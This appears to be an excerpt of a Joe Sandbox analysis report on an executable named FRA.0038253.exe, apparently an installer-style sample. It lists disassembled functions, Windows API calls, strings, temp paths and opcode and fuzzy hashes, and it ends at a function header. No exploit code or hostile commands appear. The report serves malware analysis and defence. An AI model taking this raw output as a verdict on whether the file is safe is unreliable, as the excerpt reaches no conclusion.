                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                          • String ID: -D@$Call$N$\7w
                                                                          • API String ID: 3103080414-1251897827
                                                                          • Opcode ID: c290ffe1329fa17a1c9815ecf0983b82487ca7c61a5f12ce393e077b2de52971
                                                                          • Instruction ID: 7d66e5d385180e63e30544fb3c5556dedc76f22ff26fafd20803c06a3ce53d3e
                                                                          • Opcode Fuzzy Hash: c290ffe1329fa17a1c9815ecf0983b82487ca7c61a5f12ce393e077b2de52971
                                                                          • Instruction Fuzzy Hash: 2F61C4B1A00209BFDB109F61DD45F6A3B69FB84714F00843AFB04BA1D1D7B9A951CF98
                                                                          Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                          • DrawTextA.USER32(00000000,spidsmus,000000FF,00000010,00000820), ref: 00401156
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                          • String ID: F$spidsmus
                                                                          • API String ID: 941294808-2148335437
                                                                          • Opcode ID: d61691d462883fe5d04acf452d55bcaff09ca60d36777b0a3b69fe5fd5749037
                                                                          • Instruction ID: ce0e1775dc57e2611eec9810580e82c7ccfea9863ca17ce6bffee9922d4e458c
                                                                          • Opcode Fuzzy Hash: d61691d462883fe5d04acf452d55bcaff09ca60d36777b0a3b69fe5fd5749037
                                                                          • Instruction Fuzzy Hash: DB419C71800209AFCB058F95DE459AFBFB9FF44314F00842EF991AA1A0CB389A54DFA4
                                                                          Function 00405EC0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00406051,?,?), ref: 00405EF1
                                                                          • GetShortPathNameA.KERNEL32(?,004226B0,00000400), ref: 00405EFA
                                                                            • Part of subcall function 00405D4F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5F
                                                                            • Part of subcall function 00405D4F: lstrlenA.KERNEL32(00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D91
                                                                          • GetShortPathNameA.KERNEL32(?,00422AB0,00000400), ref: 00405F17
                                                                          • wsprintfA.USER32 ref: 00405F35
                                                                          • GetFileSize.KERNEL32(00000000,00000000,00422AB0,C0000000,00000004,00422AB0,?,?,?,?,?), ref: 00405F70
                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F7F
                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB7
                                                                          • SetFilePointer.KERNEL32(0040A3D0,00000000,00000000,00000000,00000000,004222B0,00000000,-0000000A,0040A3D0,00000000,[Rename],00000000,00000000,00000000), ref: 0040600D
                                                                          • GlobalFree.KERNEL32(00000000), ref: 0040601E
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406025
                                                                            • Part of subcall function 00405DEA: GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\FRA.0038253.exe,80000000,00000003,?,?,004036EC,?,?,00000008,0000000A,0000000C), ref: 00405DEE
                                                                            • Part of subcall function 00405DEA: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,004036EC,?,?,00000008,0000000A,0000000C), ref: 00405E10
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                          • String ID: %s=%s$[Rename]
                                                                          • API String ID: 2171350718-1727408572
                                                                          • Opcode ID: 5eb247c3206cb3411ac0b00adc72d856eb6ccec34bea796ccc10527b069ef362
                                                                          • Instruction ID: 8ba473b27d2e43b71b33d04287a1253002a8f6b9e15d5b74e31d15e04c8ad0f9
                                                                          • Opcode Fuzzy Hash: 5eb247c3206cb3411ac0b00adc72d856eb6ccec34bea796ccc10527b069ef362
                                                                          • Instruction Fuzzy Hash: CC310531600B16BBC2207B65AD48F5B3A9CEF45718F15003BFA46F62D2DB7C98118ABD
                                                                          Function 00406551 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CharNextA.USER32(0000000C,*?|<>/":,00000000,?,77673410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FRA.0038253.exe",0040337D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040367F,?,00000008,0000000A,0000000C), ref: 004065A9
                                                                          • CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,77673410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FRA.0038253.exe",0040337D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040367F,?,00000008,0000000A,0000000C), ref: 004065B6
                                                                          • CharNextA.USER32(0000000C,?,77673410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FRA.0038253.exe",0040337D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040367F,?,00000008,0000000A,0000000C), ref: 004065BB
                                                                          • CharPrevA.USER32(0000000C,0000000C,77673410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FRA.0038253.exe",0040337D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040367F,?,00000008,0000000A,0000000C), ref: 004065CB
                                                                          Strings
                                                                          • "C:\Users\user\Desktop\FRA.0038253.exe", xrefs: 00406551
                                                                          • *?|<>/":, xrefs: 00406599
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00406552
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Char$Next$Prev
                                                                          • String ID: "C:\Users\user\Desktop\FRA.0038253.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 589700163-3334743949
                                                                          • Opcode ID: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
                                                                          • Instruction ID: be54c4e4c68a096c38ef6baa89aa0736c51ec1df1b66f57aa8b01daf6da65802
                                                                          • Opcode Fuzzy Hash: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
                                                                          • Instruction Fuzzy Hash: 6E11D0A18043913DEB3216286C44B776BD98F56760F19007BE8C6722CAC67C5DA2826D
                                                                          Function 0040435E Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetWindowLongA.USER32(?,000000EB), ref: 0040437B
                                                                          • GetSysColor.USER32(00000000), ref: 004043B9
                                                                          • SetTextColor.GDI32(?,00000000), ref: 004043C5
                                                                          • SetBkMode.GDI32(?,?), ref: 004043D1
                                                                          • GetSysColor.USER32(?), ref: 004043E4
                                                                          • SetBkColor.GDI32(?,?), ref: 004043F4
                                                                          • DeleteObject.GDI32(?), ref: 0040440E
                                                                          • CreateBrushIndirect.GDI32(?), ref: 00404418
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                          • String ID:
                                                                          • API String ID: 2320649405-0
                                                                          • Opcode ID: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                                                                          • Instruction ID: 6f9f1b6008425ce48584da53d5dc78dba2c0755ec76785ae7af3bb1c563c78c8
                                                                          • Opcode Fuzzy Hash: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                                                                          • Instruction Fuzzy Hash: AC2177B15007049BC730DF78DA48B5BBBF8AF81711B05893DE996A26E0D734E944CB54
                                                                          Function 70752568 Relevance: 10.6, APIs: 7, Instructions: 124COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 707512A5: GlobalAlloc.KERNEL32(00000040,707512C3,?,7075135F,-7075504B,707511C0,-000000A0), ref: 707512AD
                                                                          • GlobalFree.KERNEL32(?), ref: 7075266E
                                                                          • GlobalFree.KERNEL32(00000000), ref: 707526A8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2702525007.0000000070751000.00000020.00000001.01000000.00000006.sdmp, Offset: 70750000, based on PE: true
                                                                          • Associated: 00000000.00000002.2702483320.0000000070750000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2702568520.0000000070754000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2702605900.0000000070756000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_70750000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Global$Free$Alloc
                                                                          • String ID:
                                                                          • API String ID: 1780285237-0
                                                                          • Opcode ID: d64845f3ab2ed7f60a12fc5f4d19e19510b9b157590eaca2fe9f3bf697e6f6d0
                                                                          • Instruction ID: 9000498b994ed161d190223fc00957093ee1956563d3137467575390cc0bb57c
                                                                          • Opcode Fuzzy Hash: d64845f3ab2ed7f60a12fc5f4d19e19510b9b157590eaca2fe9f3bf697e6f6d0
                                                                          • Instruction Fuzzy Hash: 0F41FE72604242EFC7028F60CC99DAE77BAFB86314B7045ADF645C7660CB30AC0ADB65
                                                                          Function 00404C4A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404C65
                                                                          • GetMessagePos.USER32 ref: 00404C6D
                                                                          • ScreenToClient.USER32(?,?), ref: 00404C87
                                                                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404C99
                                                                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404CBF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Message$Send$ClientScreen
                                                                          • String ID: f
                                                                          • API String ID: 41195575-1993550816
                                                                          • Opcode ID: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                                                                          • Instruction ID: fa75b469e5113c283003aa9f91b110ddb7161f06a95e945890e67c7b79eb67e4
                                                                          • Opcode Fuzzy Hash: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                                                                          • Instruction Fuzzy Hash: 6E019E71900218BAEB00DB94CD81FFFBBBCAF44711F10012BBA40F61D0C7B899418BA4
                                                                          Function 00401E5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDC.USER32(?), ref: 00401E5D
                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E77
                                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401E7F
                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401E90
                                                                          • CreateFontIndirectA.GDI32(0040B800), ref: 00401EDF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                          • String ID: Tahoma
                                                                          • API String ID: 3808545654-3580928618
                                                                          • Opcode ID: 0b7de653160e8b353b9f1c57968828fe86a8407ec40fb4ead828515f31cf0746
                                                                          • Instruction ID: 19317440b73845a0a85ac2cd22d5e5bd56122c2d5af6ad324d0524dc50571349
                                                                          • Opcode Fuzzy Hash: 0b7de653160e8b353b9f1c57968828fe86a8407ec40fb4ead828515f31cf0746
                                                                          • Instruction Fuzzy Hash: FF014072545244AFE7007B60AE49A9E3FB8E755301F10887AF181B62F2CB7805458B6D
                                                                          Function 00402E4A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E65
                                                                          • MulDiv.KERNEL32(0008E0A5,00000064,?), ref: 00402E90
                                                                          • wsprintfA.USER32 ref: 00402EA0
                                                                          • SetWindowTextA.USER32(?,?), ref: 00402EB0
                                                                          • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402EC2
                                                                          Strings
                                                                          • verifying installer: %d%%, xrefs: 00402E9A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                          • String ID: verifying installer: %d%%
                                                                          • API String ID: 1451636040-82062127
                                                                          • Opcode ID: 28c4548f622da75b34f4b00d5fa0069a4700956d7e1aa93142aee228208de263
                                                                          • Instruction ID: 22078c6fad303157943161b2cfb0520d7f952f3844b57bc3a92c884290227ce9
                                                                          • Opcode Fuzzy Hash: 28c4548f622da75b34f4b00d5fa0069a4700956d7e1aa93142aee228208de263
                                                                          • Instruction Fuzzy Hash: D6016270640208FBEF10AF60DD09EEE37A9AB00345F008039FA06B51E0DBB49D56CF99
                                                                          Function 70752381 Relevance: 9.1, APIs: 6, Instructions: 140memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GlobalFree.KERNEL32(00000000), ref: 707524D7
                                                                            • Part of subcall function 707512B4: lstrcpynA.KERNEL32(00000000,?,7075135F,-7075504B,707511C0,-000000A0), ref: 707512C4
                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 70752452
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 70752467
                                                                          • GlobalAlloc.KERNEL32(00000040,00000010), ref: 70752478
                                                                          • CLSIDFromString.OLE32(00000000,00000000), ref: 70752486
                                                                          • GlobalFree.KERNEL32(00000000), ref: 7075248D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2702525007.0000000070751000.00000020.00000001.01000000.00000006.sdmp, Offset: 70750000, based on PE: true
                                                                          • Associated: 00000000.00000002.2702483320.0000000070750000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2702568520.0000000070754000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2702605900.0000000070756000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_70750000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                          • String ID:
                                                                          • API String ID: 3730416702-0
                                                                          • Opcode ID: 6abf895f1b684d708461d60ddea81c13f9c0e8489e5d840d3eb8dda73c3fb99d
                                                                          • Instruction ID: 0a430a68e852ef3c478c090fcdd737e5674a8204612697a1193ec2c8627824f6
                                                                          • Opcode Fuzzy Hash: 6abf895f1b684d708461d60ddea81c13f9c0e8489e5d840d3eb8dda73c3fb99d
                                                                          • Instruction Fuzzy Hash: C04189B2504345EFD3518F24DD49BAE77B8FB42312F20492AF54ACB680E774A84ACB61
                                                                          Function 0040280D Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040286E
                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040288A
                                                                          • GlobalFree.KERNEL32(?), ref: 004028C9
                                                                          • GlobalFree.KERNEL32(00000000), ref: 004028DC
                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004028F8
                                                                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040290B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                          • String ID:
                                                                          • API String ID: 2667972263-0
                                                                          • Opcode ID: 5e3d71c1b489099ee601d664269c4a221f4f79db0d852d2a7e320f248806304c
                                                                          • Instruction ID: 421b97e042d8ed64f47f64816392ec3ab84a533a9b7d5bb53c113432182462de
                                                                          • Opcode Fuzzy Hash: 5e3d71c1b489099ee601d664269c4a221f4f79db0d852d2a7e320f248806304c
                                                                          • Instruction Fuzzy Hash: F3318D72C00124BBDF217FA5CD48D9E7B79AF14324F10823AF554B62E1CB7949419FA8
                                                                          Function 00404B40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
